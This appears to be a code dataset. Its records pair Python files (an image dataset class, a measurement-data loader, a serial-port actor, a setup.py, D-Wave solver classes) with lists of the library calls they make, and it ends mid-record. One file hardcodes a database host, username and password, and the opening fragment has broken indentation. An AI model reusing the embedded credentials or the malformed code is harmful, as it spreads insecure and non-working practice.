lambda x: os.path.join("/".join(config.data_paths_csv.split("/")[:-1]), x)
)
def __len__(self):
return self.data_paths_df.shape[0]
def __getitem__(self, idx):
image = Image.open(self.data_paths_df.iloc[idx]["path"]).convert("L")
label = self.data_paths_df.iloc[idx]["label"]
        graph = None  # ensure 'graph' is always defined, even when no graph transform is configured
        if self.graph_transform is not None:
            graph = self.graph_transform(image)
if self.image_transform is not None:
image = self.image_transform(image)
return {
"graph": graph,
"image": image,
"label": torch.tensor(label, dtype=torch.long),
}
| [
"PIL.Image.open",
"pandas.read_csv",
"src.utils.mapper.configmapper.map",
"torch.tensor",
"torchvision.transforms.Compose",
"src.utils.mapper.configmapper.get_object"
] | [((263, 309), 'src.utils.mapper.configmapper.map', 'configmapper.map', (['"""datasets"""', '"""covid_img_slic"""'], {}), "('datasets', 'covid_img_slic')\n", (279, 309), False, 'from src.utils.mapper import configmapper\n'), ((1499, 1533), 'pandas.read_csv', 'pd.read_csv', (['config.data_paths_csv'], {}), '(config.data_paths_csv)\n', (1510, 1533), True, 'import pandas as pd\n'), ((831, 872), 'torchvision.transforms.Compose', 'transforms.Compose', (['graph_transformations'], {}), '(graph_transformations)\n', (849, 872), False, 'from torchvision import transforms\n'), ((1352, 1393), 'torchvision.transforms.Compose', 'transforms.Compose', (['image_transformations'], {}), '(image_transformations)\n', (1370, 1393), False, 'from torchvision import transforms\n'), ((2216, 2253), 'torch.tensor', 'torch.tensor', (['label'], {'dtype': 'torch.long'}), '(label, dtype=torch.long)\n', (2228, 2253), False, 'import torch\n'), ((1818, 1866), 'PIL.Image.open', 'Image.open', (["self.data_paths_df.iloc[idx]['path']"], {}), "(self.data_paths_df.iloc[idx]['path'])\n", (1828, 1866), False, 'from PIL import Image\n'), ((701, 757), 'src.utils.mapper.configmapper.get_object', 'configmapper.get_object', (['"""transforms"""', "transform['type']"], {}), "('transforms', transform['type'])\n", (724, 757), False, 'from src.utils.mapper import configmapper\n'), ((1222, 1278), 'src.utils.mapper.configmapper.get_object', 'configmapper.get_object', (['"""transforms"""', "transform['type']"], {}), "('transforms', transform['type'])\n", (1245, 1278), False, 'from src.utils.mapper import configmapper\n')] |
import logging
from core_tools.data.ds.data_set_core import data_set
from core_tools.data.ds.data_set_raw import data_set_raw
from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator
import json
import qcodes as qc
def load_by_id(exp_id):
'''
load a dataset by specifying its id (search in local db)
args:
exp_id (int) : id of the experiment you want to load
'''
SQL_mgr = SQL_dataset_creator()
return data_set(SQL_mgr.fetch_raw_dataset_by_Id(exp_id))
def load_by_uuid(exp_uuid, copy2localdb=False):
'''
load a dataset by specifying its uuid (searches in local and remote db)
args:
exp_uuid (int) : uuid of the experiment you want to load
copy2localdb (bool): copy measurement to local database if only in remote
'''
SQL_mgr = SQL_dataset_creator()
return data_set(SQL_mgr.fetch_raw_dataset_by_UUID(exp_uuid, copy2localdb))
def create_new_data_set(experiment_name, measurement_snapshot, *m_params):
'''
generates a dataclass for a given set of measurement parameters
Args:
experiment_name (str) : name of experiment
measurement_snapshot (dict[str,Any]) : snapshot of measurement parameters
*m_params (m_param_dataset) : datasets of the measurement parameters
'''
ds = data_set_raw(exp_name=experiment_name)
if qc.Station.default is not None:
station_snapshot = qc.Station.default.snapshot()
snapshot = {'station': station_snapshot}
else:
logging.error('No station configured')
snapshot = {'station': None}
    # initialize the buffers for the measurement
for m_param in m_params:
m_param.init_data_dataclass()
ds.measurement_parameters += [m_param]
ds.measurement_parameters_raw += m_param.to_SQL_data_structure()
snapshot['measurement'] = measurement_snapshot
# encode and decode to convert all numpy arrays and complex numbers to jsonable lists and dictionaries
snapshot_json = json.dumps(snapshot, cls=qc.utils.helpers.NumpyJSONEncoder)
snapshot = json.loads(snapshot_json)
ds.snapshot = snapshot
SQL_mgr = SQL_dataset_creator()
SQL_mgr.register_measurement(ds)
return data_set(ds)
if __name__ == '__main__':
from core_tools.data.SQL.connect import set_up_local_storage,set_up_remote_storage
set_up_remote_storage('172.16.31.10', 5432, 'xld_measurement_pc', 'XLDspin001', 'spin_data', "6dot", "XLD", "6D3S - SQ20-20-5-18-4")
    ds = load_by_id(23000)
print(ds.snapshot['station']['instruments']['gates']['parameters'].keys())
for key in ds.snapshot['station']['instruments']['gates']['parameters'].keys():
print(key, ds.snapshot['station']['instruments']['gates']['parameters'][key]['value'])
# print(ds.metadata)
# print(ds.m1.z())
# print(ds.m1.x())
# print(ds.m1.y()) | [
"core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator",
"json.loads",
"core_tools.data.SQL.connect.set_up_remote_storage",
"json.dumps",
"core_tools.data.ds.data_set_core.data_set",
"qcodes.Station.default.snapshot",
"logging.error",
"core_tools.data.ds.data_set_raw.data_set_raw"
] | [((419, 440), 'core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator', 'SQL_dataset_creator', ([], {}), '()\n', (438, 440), False, 'from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator\n'), ((815, 836), 'core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator', 'SQL_dataset_creator', ([], {}), '()\n', (834, 836), False, 'from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator\n'), ((1306, 1344), 'core_tools.data.ds.data_set_raw.data_set_raw', 'data_set_raw', ([], {'exp_name': 'experiment_name'}), '(exp_name=experiment_name)\n', (1318, 1344), False, 'from core_tools.data.ds.data_set_raw import data_set_raw\n'), ((2001, 2060), 'json.dumps', 'json.dumps', (['snapshot'], {'cls': 'qc.utils.helpers.NumpyJSONEncoder'}), '(snapshot, cls=qc.utils.helpers.NumpyJSONEncoder)\n', (2011, 2060), False, 'import json\n'), ((2076, 2101), 'json.loads', 'json.loads', (['snapshot_json'], {}), '(snapshot_json)\n', (2086, 2101), False, 'import json\n'), ((2145, 2166), 'core_tools.data.SQL.SQL_dataset_creator.SQL_dataset_creator', 'SQL_dataset_creator', ([], {}), '()\n', (2164, 2166), False, 'from core_tools.data.SQL.SQL_dataset_creator import SQL_dataset_creator\n'), ((2216, 2228), 'core_tools.data.ds.data_set_core.data_set', 'data_set', (['ds'], {}), '(ds)\n', (2224, 2228), False, 'from core_tools.data.ds.data_set_core import data_set\n'), ((2349, 2485), 'core_tools.data.SQL.connect.set_up_remote_storage', 'set_up_remote_storage', (['"""172.16.31.10"""', '(5432)', '"""xld_measurement_pc"""', '"""XLDspin001"""', '"""spin_data"""', '"""6dot"""', '"""XLD"""', '"""6D3S - SQ20-20-5-18-4"""'], {}), "('172.16.31.10', 5432, 'xld_measurement_pc',\n 'XLDspin001', 'spin_data', '6dot', 'XLD', '6D3S - SQ20-20-5-18-4')\n", (2370, 2485), False, 'from core_tools.data.SQL.connect import set_up_local_storage, set_up_remote_storage\n'), ((1412, 1441), 'qcodes.Station.default.snapshot', 'qc.Station.default.snapshot', ([], {}), '()\n', (1439, 1441), True, 'import qcodes as qc\n'), ((1509, 1547), 'logging.error', 'logging.error', (['"""No station configured"""'], {}), "('No station configured')\n", (1522, 1547), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from calvin.actor.actor import Actor, ActionResult, manage, condition, guard
from calvin.utilities.calvinlogger import get_logger
from calvin.runtime.north.calvin_token import ExceptionToken
from serial import PARITY_NONE, STOPBITS_ONE, EIGHTBITS
_log = get_logger(__name__)
class SerialPort(Actor):
"""
Read/write data from serial port.
    Inputs:
in : Tokens to write.
Outputs:
out : Tokens read.
"""
@manage(['devicename', 'baudrate', 'bytesize', 'parity', 'stopbits', 'timeout', 'xonxoff', 'rtscts'])
def init(self, devicename, baudrate, bytesize=EIGHTBITS, parity=PARITY_NONE, stopbits=STOPBITS_ONE, timeout=0, xonxoff=0, rtscts=0):
self.not_found = False
self.devicename = devicename
self.baudrate = baudrate
try:
self.device = self.calvinsys.io.serialport.open(
devicename,
baudrate,
bytesize,
parity,
stopbits,
timeout,
xonxoff,
rtscts)
except:
self.device = None
self.not_found = True
@condition([], ['out'])
@guard(lambda self: self.not_found)
def device_not_found(self):
token = ExceptionToken(value="Device not found")
self.not_found = False # Only report once
return ActionResult(production=(token, ))
@condition([], ['out'])
@guard(lambda self: self.device and self.device.has_data())
def read(self):
data = self.device.read()
return ActionResult(production=(data, ))
@condition(action_input=['in'])
@guard(lambda self, _: self.device)
def write(self, data):
self.device.write(str(data))
return ActionResult(production=())
action_priority = (device_not_found, read, write)
| [
"calvin.actor.actor.condition",
"calvin.actor.actor.guard",
"calvin.actor.actor.manage",
"calvin.actor.actor.ActionResult",
"calvin.utilities.calvinlogger.get_logger",
"calvin.runtime.north.calvin_token.ExceptionToken"
] | [((860, 880), 'calvin.utilities.calvinlogger.get_logger', 'get_logger', (['__name__'], {}), '(__name__)\n', (870, 880), False, 'from calvin.utilities.calvinlogger import get_logger\n'), ((1049, 1153), 'calvin.actor.actor.manage', 'manage', (["['devicename', 'baudrate', 'bytesize', 'parity', 'stopbits', 'timeout',\n 'xonxoff', 'rtscts']"], {}), "(['devicename', 'baudrate', 'bytesize', 'parity', 'stopbits',\n 'timeout', 'xonxoff', 'rtscts'])\n", (1055, 1153), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((1753, 1775), 'calvin.actor.actor.condition', 'condition', (['[]', "['out']"], {}), "([], ['out'])\n", (1762, 1775), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((1781, 1815), 'calvin.actor.actor.guard', 'guard', (['(lambda self: self.not_found)'], {}), '(lambda self: self.not_found)\n', (1786, 1815), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2012, 2034), 'calvin.actor.actor.condition', 'condition', (['[]', "['out']"], {}), "([], ['out'])\n", (2021, 2034), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2208, 2238), 'calvin.actor.actor.condition', 'condition', ([], {'action_input': "['in']"}), "(action_input=['in'])\n", (2217, 2238), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2244, 2278), 'calvin.actor.actor.guard', 'guard', (['(lambda self, _: self.device)'], {}), '(lambda self, _: self.device)\n', (2249, 2278), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((1864, 1904), 'calvin.runtime.north.calvin_token.ExceptionToken', 'ExceptionToken', ([], {'value': '"""Device not found"""'}), "(value='Device not found')\n", (1878, 1904), False, 'from calvin.runtime.north.calvin_token import ExceptionToken\n'), ((1971, 2004), 'calvin.actor.actor.ActionResult', 'ActionResult', ([], {'production': '(token,)'}), '(production=(token,))\n', (1983, 2004), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2168, 2200), 'calvin.actor.actor.ActionResult', 'ActionResult', ([], {'production': '(data,)'}), '(production=(data,))\n', (2180, 2200), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n'), ((2358, 2385), 'calvin.actor.actor.ActionResult', 'ActionResult', ([], {'production': '()'}), '(production=())\n', (2370, 2385), False, 'from calvin.actor.actor import Actor, ActionResult, manage, condition, guard\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='asciitree',
version='0.3.4.dev1',
description='Draws ASCII trees.',
long_description=read('README.rst'),
author='<NAME>',
author_email='<EMAIL>',
url='http://github.com/mbr/asciitree',
license='MIT',
packages=find_packages(exclude=['tests']),
install_requires=[],
)
| [
"os.path.dirname",
"setuptools.find_packages"
] | [((452, 484), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "['tests']"}), "(exclude=['tests'])\n", (465, 484), False, 'from setuptools import setup, find_packages\n'), ((150, 175), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (165, 175), False, 'import os\n')] |
# Copyright 2017 D-Wave Systems Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
A :term:`solver` is a resource for solving problems.
Solvers are responsible for:
- Encoding submitted problems
- Checking submitted parameters
- Decoding answers
- Adding problems to a client's submission queue
You can list all solvers available to a :class:`~dwave.cloud.client.Client` with its
:func:`~dwave.cloud.client.Client.get_solvers` method and select and return one with its
:func:`~dwave.cloud.client.Client.get_solver` method.
"""
from __future__ import division, absolute_import
import json
import logging
import warnings
from collections import Mapping
from dwave.cloud.exceptions import *
from dwave.cloud.coders import (
encode_problem_as_qp, encode_problem_as_bq,
decode_qp_numpy, decode_qp, decode_bq)
from dwave.cloud.utils import uniform_iterator, reformat_qubo_as_ising
from dwave.cloud.computation import Future
# Use numpy if available for fast encoding/decoding
try:
import numpy as np
_numpy = True
except ImportError:
_numpy = False
__all__ = ['Solver', 'BaseSolver', 'StructuredSolver', 'UnstructuredSolver']
logger = logging.getLogger(__name__)
class BaseSolver(object):
"""Base class for a general D-Wave solver.
This class provides :term:`Ising`, :term:`QUBO` and :term:`BQM` sampling
methods and encapsulates the solver description returned from the D-Wave
cloud API.
Args:
client (:class:`Client`):
Client that manages access to this solver.
data (`dict`):
Data from the server describing this solver.
Examples:
This example creates a client using the local system's default D-Wave Cloud
Client configuration file and checks the identity of its default solver.
>>> from dwave.cloud import Client
>>> with Client.from_config() as client:
... solver = client.get_solver()
... solver.id # doctest: +SKIP
'EXAMPLE_2000Q_SYSTEM'
"""
# Classes of problems the remote solver has to support (at least one of these)
# in order for `Solver` to be able to abstract, or use, that solver
_handled_problem_types = {}
_handled_encoding_formats = {}
def __init__(self, client, data):
# client handles async api requests (via local thread pool)
self.client = client
# data for each solver includes at least: id, description, properties,
# status and avg_load
self.data = data
# Each solver has an ID field
try:
self.id = data['id']
except KeyError:
raise InvalidAPIResponseError("Missing solver property: 'id'")
# Properties of this solver the server presents: dict
try:
self.properties = data['properties']
except KeyError:
raise SolverPropertyMissingError("Missing solver property: 'properties'")
# The set of extra parameters this solver will accept in sample_ising or sample_qubo: dict
self.parameters = self.properties.get('parameters', {})
# Ensure this remote solver supports at least one of the problem types we know how to handle
try:
self.supported_problem_types = set(self.properties['supported_problem_types'])
except KeyError:
raise SolverPropertyMissingError(
"Missing solver property: 'properties.supported_problem_types'")
if self.supported_problem_types.isdisjoint(self._handled_problem_types):
raise UnsupportedSolverError(
("Remote solver {id!r} supports {supports} problems, "
"but {cls!r} class of solvers handles only {handled}").format(
id=self.id,
supports=list(self.supported_problem_types),
cls=type(self).__name__,
handled=list(self._handled_problem_types)))
# When True the solution data will be returned as numpy matrices: False
# TODO: deprecate
self.return_matrix = False
# Derived solver properties (not present in solver data properties dict)
self.derived_properties = {
'qpu', 'software', 'online', 'avg_load', 'name'
}
def __repr__(self):
return "{}(id={!r})".format(type(self).__name__, self.id)
def _retrieve_problem(self, id_):
"""Resume polling for a problem previously submitted.
Args:
id_: Identification of the query.
Returns:
:obj: `Future`
"""
future = Future(self, id_, self.return_matrix)
self.client._poll(future)
return future
def check_problem(self, *args, **kwargs):
return True
def _decode_qp(self, msg):
if _numpy:
return decode_qp_numpy(msg, return_matrix=self.return_matrix)
else:
return decode_qp(msg)
def decode_response(self, msg):
if msg['type'] not in self._handled_problem_types:
raise ValueError('Unknown problem type received.')
fmt = msg.get('answer', {}).get('format')
if fmt not in self._handled_encoding_formats:
raise ValueError('Unhandled answer encoding format received.')
if fmt == 'qp':
return self._decode_qp(msg)
elif fmt == 'bq':
return decode_bq(msg)
else:
raise ValueError("Don't know how to decode %r answer format" % fmt)
# Sampling methods
def sample_ising(self, linear, quadratic, **params):
raise NotImplementedError
def sample_qubo(self, qubo, **params):
raise NotImplementedError
def sample_bqm(self, bqm, **params):
raise NotImplementedError
def upload_bqm(self, bqm):
raise NotImplementedError
# Derived properties
@property
def name(self):
return self.id
@property
def online(self):
"Is this solver online (or offline)?"
return self.data.get('status', 'online').lower() == 'online'
@property
def avg_load(self):
"Solver's average load, at the time of description fetch."
return self.data.get('avg_load')
@property
def qpu(self):
"Is this a QPU-based solver?"
# TODO: add a field for this in SAPI response; for now base decision on id/name
return not self.id.startswith('c4-sw_')
@property
def software(self):
"Is this a software-based solver?"
# TODO: add a field for this in SAPI response; for now base decision on id/name
return self.id.startswith('c4-sw_')
@property
def is_qpu(self):
warnings.warn("'is_qpu' property is deprecated in favor of 'qpu'.", DeprecationWarning)
return self.qpu
@property
def is_software(self):
warnings.warn("'is_software' property is deprecated in favor of 'software'.", DeprecationWarning)
return self.software
@property
def is_online(self):
warnings.warn("'is_online' property is deprecated in favor of 'online'.", DeprecationWarning)
return self.online
class UnstructuredSolver(BaseSolver):
"""Class for D-Wave unstructured solvers.
This class provides :term:`Ising`, :term:`QUBO` and :term:`BQM` sampling
methods and encapsulates the solver description returned from the D-Wave
cloud API.
Args:
client (:class:`~dwave.cloud.client.Client`):
Client that manages access to this solver.
data (`dict`):
Data from the server describing this solver.
"""
_handled_problem_types = {"bqm"}
_handled_encoding_formats = {"bq"}
def sample_ising(self, linear, quadratic, **params):
"""Sample from the specified :term:`BQM`.
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`):
A binary quadratic model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Note:
To use this method, dimod package has to be installed.
"""
try:
import dimod
except ImportError: # pragma: no cover
raise RuntimeError("Can't use solver of type 'bqm' without dimod. "
"Re-install the library with 'bqm' support.")
bqm = dimod.BinaryQuadraticModel.from_ising(linear, quadratic)
return self.sample_bqm(bqm, **params)
def sample_qubo(self, qubo, **params):
"""Sample from the specified :term:`QUBO`.
Args:
qubo (dict[(int, int), float]):
Coefficients of a quadratic unconstrained binary optimization
(QUBO) model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Note:
To use this method, dimod package has to be installed.
"""
try:
import dimod
except ImportError: # pragma: no cover
raise RuntimeError("Can't use solver of type 'bqm' without dimod. "
"Re-install the library with 'bqm' support.")
bqm = dimod.BinaryQuadraticModel.from_qubo(qubo)
return self.sample_bqm(bqm, **params)
def sample_bqm(self, bqm, **params):
"""Sample from the specified :term:`BQM`.
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`/str):
A binary quadratic model, or a reference to one
(Problem ID returned by `.upload_bqm` method).
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`~dwave.cloud.computation.Future`
Note:
To use this method, dimod package has to be installed.
"""
# encode the request
body = json.dumps({
'solver': self.id,
'data': encode_problem_as_bq(bqm),
'type': 'bqm',
'params': params
})
logger.trace("Encoded sample request: %s", body)
future = Future(solver=self, id_=None, return_matrix=self.return_matrix)
logger.debug("Submitting new problem to: %s", self.id)
self.client._submit(body, future)
return future
def upload_bqm(self, bqm):
"""Upload the specified :term:`BQM` to SAPI, returning a Problem ID
that can be used to submit the BQM to this solver (i.e. call the
`.sample_bqm` method).
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`/bytes-like/file-like):
A binary quadratic model given either as an in-memory
:class:`~dimod.BinaryQuadraticModel` object, or as raw data
(encoded serialized model) in either a file-like or a bytes-like
object.
Returns:
:class:`concurrent.futures.Future`[str]:
Problem ID in a Future. Problem ID can be used to submit
problems by reference.
Note:
To use this method, dimod package has to be installed.
"""
if hasattr(bqm, 'to_serializable'):
data = encode_problem_as_bq(bqm, compress=True)['data']
else:
# raw data (ready for upload) in `bqm`
data = bqm
return self.client.upload_problem_encoded(data)
class StructuredSolver(BaseSolver):
"""Class for D-Wave structured solvers.
This class provides :term:`Ising`, :term:`QUBO` and :term:`BQM` sampling
methods and encapsulates the solver description returned from the D-Wave
cloud API.
Args:
client (:class:`~dwave.cloud.client.Client`):
Client that manages access to this solver.
data (`dict`):
Data from the server describing this solver.
"""
_handled_problem_types = {"ising", "qubo"}
_handled_encoding_formats = {"qp"}
def __init__(self, *args, **kwargs):
super(StructuredSolver, self).__init__(*args, **kwargs)
# The exact sequence of nodes/edges is used in encoding problems and must be preserved
try:
self._encoding_qubits = self.properties['qubits']
except KeyError:
raise SolverPropertyMissingError("Missing solver property: 'properties.qubits'")
try:
self._encoding_couplers = [tuple(edge) for edge in self.properties['couplers']]
except KeyError:
raise SolverPropertyMissingError("Missing solver property: 'properties.couplers'")
# The nodes in this solver's graph: set(int)
self.nodes = self.variables = set(self._encoding_qubits)
# The edges in this solver's graph, every edge will be present as (a, b) and (b, a): set(tuple(int, int))
self.edges = self.couplers = set(tuple(edge) for edge in self._encoding_couplers) | \
set((edge[1], edge[0]) for edge in self._encoding_couplers)
# The edges in this solver's graph, each edge will only be represented once: set(tuple(int, int))
self.undirected_edges = {edge for edge in self.edges if edge[0] < edge[1]}
# Create a set of default parameters for the queries
self._params = {}
# Add derived properties specific for this solver
self.derived_properties.update({'lower_noise', 'num_active_qubits'})
# Derived properties
@property
def num_active_qubits(self):
"The number of active (encoding) qubits."
return len(self.nodes)
@property
def is_vfyc(self):
"Is this a virtual full-yield chip?"
return self.properties.get('vfyc') == True
@property
def has_flux_biases(self):
"Solver supports/accepts ``flux_biases``."
return 'flux_biases' in self.parameters
@property
def has_anneal_schedule(self):
"Solver supports/accepts ``anneal_schedule``."
return 'anneal_schedule' in self.parameters
@property
def num_qubits(self):
"Nominal number of qubits on chip (includes active AND inactive)."
return self.properties.get('num_qubits')
@property
def lower_noise(self):
return "lower_noise" in self.properties.get("tags", [])
def max_num_reads(self, **params):
"""Returns the maximum number of reads for the given solver parameters.
Args:
**params:
Parameters for the sampling method. Relevant to num_reads:
- annealing_time
- readout_thermalization
- num_reads
- programming_thermalization
Returns:
int: The maximum number of reads.
"""
# dev note: in the future it would be good to have a way of doing this
# server-side, as we are duplicating logic here.
properties = self.properties
if self.software or not params:
# software solvers don't use any of the above parameters
return properties['num_reads_range'][1]
# qpu
_, duration = properties['problem_run_duration_range']
annealing_time = params.get('annealing_time',
properties['default_annealing_time'])
readout_thermalization = params.get('readout_thermalization',
properties['default_readout_thermalization'])
programming_thermalization = params.get('programming_thermalization',
properties['default_programming_thermalization'])
return min(properties['num_reads_range'][1],
int((duration - programming_thermalization)
/ (annealing_time + readout_thermalization)))
# Sampling methods
def sample_ising(self, linear, quadratic, **params):
"""Sample from the specified :term:`Ising` model.
Args:
linear (list/dict):
Linear terms of the model (h).
quadratic (dict[(int, int), float]):
Quadratic terms of the model (J), stored in a dict. With keys
that are 2-tuples of variables and values are quadratic biases
associated with the pair of variables (the interaction).
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits a
simple :term:`Ising` problem (opposite linear biases on two coupled qubits), and samples
5 times.
>>> from dwave.cloud import Client
>>> with Client.from_config() as client:
... solver = client.get_solver()
... u, v = next(iter(solver.edges))
... computation = solver.sample_ising({u: -1, v: 1}, {}, num_reads=5) # doctest: +SKIP
... for i in range(5):
... print(computation.samples[i][u], computation.samples[i][v])
...
...
(1, -1)
(1, -1)
(1, -1)
(1, -1)
(1, -1)
"""
# Our linear and quadratic objective terms are already separated in an
# ising model so we can just directly call `_sample`.
return self._sample('ising', linear, quadratic, params)
def sample_qubo(self, qubo, **params):
"""Sample from the specified :term:`QUBO`.
Args:
qubo (dict[(int, int), float]):
Coefficients of a quadratic unconstrained binary optimization
(QUBO) model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, submits
a :term:`QUBO` problem (a Boolean NOT gate represented by a penalty model), and
samples 5 times.
>>> from dwave.cloud import Client
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... u, v = next(iter(solver.edges))
... Q = {(u, u): -1, (u, v): 0, (v, u): 2, (v, v): -1}
... computation = solver.sample_qubo(Q, num_reads=5)
... for i in range(5):
... print(computation.samples[i][u], computation.samples[i][v])
...
...
(0, 1)
(1, 0)
(1, 0)
(0, 1)
(1, 0)
"""
linear, quadratic = reformat_qubo_as_ising(qubo)
return self._sample('qubo', linear, quadratic, params)
def sample_bqm(self, bqm, **params):
"""Sample from the specified :term:`BQM`.
Args:
bqm (:class:`~dimod.BinaryQuadraticModel`):
A binary quadratic model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
Note:
To use this method, dimod package has to be installed.
"""
try:
import dimod
except ImportError: # pragma: no cover
raise RuntimeError("Can't sample from 'bqm' without dimod. "
"Re-install the library with 'bqm' support.")
ising = bqm.spin
return self.sample_ising(ising.linear, ising.quadratic, **params)
def _sample(self, type_, linear, quadratic, params):
"""Internal method for `sample_ising` and `sample_qubo`.
Args:
linear (list/dict):
Linear terms of the model.
quadratic (dict[(int, int), float]):
Quadratic terms of the model.
**params:
Parameters for the sampling method, solver-specific.
Returns:
:class:`Future`
"""
# Check the problem
if not self.check_problem(linear, quadratic):
raise InvalidProblemError("Problem graph incompatible with solver.")
# Mix the new parameters with the default parameters
combined_params = dict(self._params)
combined_params.update(params)
# Check the parameters before submitting
for key in combined_params:
if key not in self.parameters and not key.startswith('x_'):
raise KeyError("{} is not a parameter of this solver.".format(key))
# transform some of the parameters in-place
self._format_params(type_, combined_params)
body = json.dumps({
'solver': self.id,
'data': encode_problem_as_qp(self, linear, quadratic),
'type': type_,
'params': combined_params
})
logger.trace("Encoded sample request: %s", body)
future = Future(solver=self, id_=None, return_matrix=self.return_matrix)
logger.debug("Submitting new problem to: %s", self.id)
self.client._submit(body, future)
return future
def _format_params(self, type_, params):
"""Reformat some of the parameters for sapi."""
if 'initial_state' in params:
# NB: at this moment the error raised when initial_state does not match lin/quad (in
# active qubits) is not very informative, but there is also no clean way to check here
# that they match because lin can be either a list or a dict. In the future it would be
# good to check.
initial_state = params['initial_state']
if isinstance(initial_state, Mapping):
initial_state_list = [3]*self.properties['num_qubits']
low = -1 if type_ == 'ising' else 0
for v, val in initial_state.items():
if val == 3:
continue
if val <= 0:
initial_state_list[v] = low
else:
initial_state_list[v] = 1
params['initial_state'] = initial_state_list
# else: support old format
def check_problem(self, linear, quadratic):
"""Test if an Ising model matches the graph provided by the solver.
Args:
linear (list/dict):
Linear terms of the model (h).
quadratic (dict[(int, int), float]):
Quadratic terms of the model (J).
Returns:
boolean
Examples:
This example creates a client using the local system's default D-Wave Cloud Client
configuration file, which is configured to access a D-Wave 2000Q QPU, and
tests a simple :term:`Ising` model for two target embeddings (that is, representations
of the model's graph by coupled qubits on the QPU's sparsely connected graph),
where only the second is valid.
>>> from dwave.cloud import Client
>>> print((0, 1) in solver.edges) # doctest: +SKIP
False
>>> print((0, 4) in solver.edges) # doctest: +SKIP
True
>>> with Client.from_config() as client: # doctest: +SKIP
... solver = client.get_solver()
... print(solver.check_problem({0: -1, 1: 1},{(0, 1):0.5}))
... print(solver.check_problem({0: -1, 4: 1},{(0, 4):0.5}))
...
False
True
"""
for key, value in uniform_iterator(linear):
if value != 0 and key not in self.nodes:
return False
for key, value in uniform_iterator(quadratic):
if value != 0 and tuple(key) not in self.edges:
return False
return True
# for backwards compatibility:
Solver = StructuredSolver
# list of all available solvers, ordered according to loading attempt priority
# (more specific first)
available_solvers = [StructuredSolver, UnstructuredSolver] | [
"logging.getLogger",
"dwave.cloud.coders.decode_qp_numpy",
"dwave.cloud.coders.decode_bq",
"dwave.cloud.coders.encode_problem_as_bq",
"dwave.cloud.utils.reformat_qubo_as_ising",
"dwave.cloud.utils.uniform_iterator",
"dwave.cloud.coders.decode_qp",
"dwave.cloud.coders.encode_problem_as_qp",
"dimod.Bi... | [((1678, 1705), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1695, 1705), False, 'import logging\n'), ((5113, 5150), 'dwave.cloud.computation.Future', 'Future', (['self', 'id_', 'self.return_matrix'], {}), '(self, id_, self.return_matrix)\n', (5119, 5150), False, 'from dwave.cloud.computation import Future\n'), ((7190, 7281), 'warnings.warn', 'warnings.warn', (['"""\'is_qpu\' property is deprecated in favor of \'qpu\'."""', 'DeprecationWarning'], {}), '("\'is_qpu\' property is deprecated in favor of \'qpu\'.",\n DeprecationWarning)\n', (7203, 7281), False, 'import warnings\n'), ((7352, 7453), 'warnings.warn', 'warnings.warn', (['"""\'is_software\' property is deprecated in favor of \'software\'."""', 'DeprecationWarning'], {}), '("\'is_software\' property is deprecated in favor of \'software\'.",\n DeprecationWarning)\n', (7365, 7453), False, 'import warnings\n'), ((7527, 7624), 'warnings.warn', 'warnings.warn', (['"""\'is_online\' property is deprecated in favor of \'online\'."""', 'DeprecationWarning'], {}), '("\'is_online\' property is deprecated in favor of \'online\'.",\n DeprecationWarning)\n', (7540, 7624), False, 'import warnings\n'), ((8901, 8957), 'dimod.BinaryQuadraticModel.from_ising', 'dimod.BinaryQuadraticModel.from_ising', (['linear', 'quadratic'], {}), '(linear, quadratic)\n', (8938, 8957), False, 'import dimod\n'), ((9755, 9797), 'dimod.BinaryQuadraticModel.from_qubo', 'dimod.BinaryQuadraticModel.from_qubo', (['qubo'], {}), '(qubo)\n', (9791, 9797), False, 'import 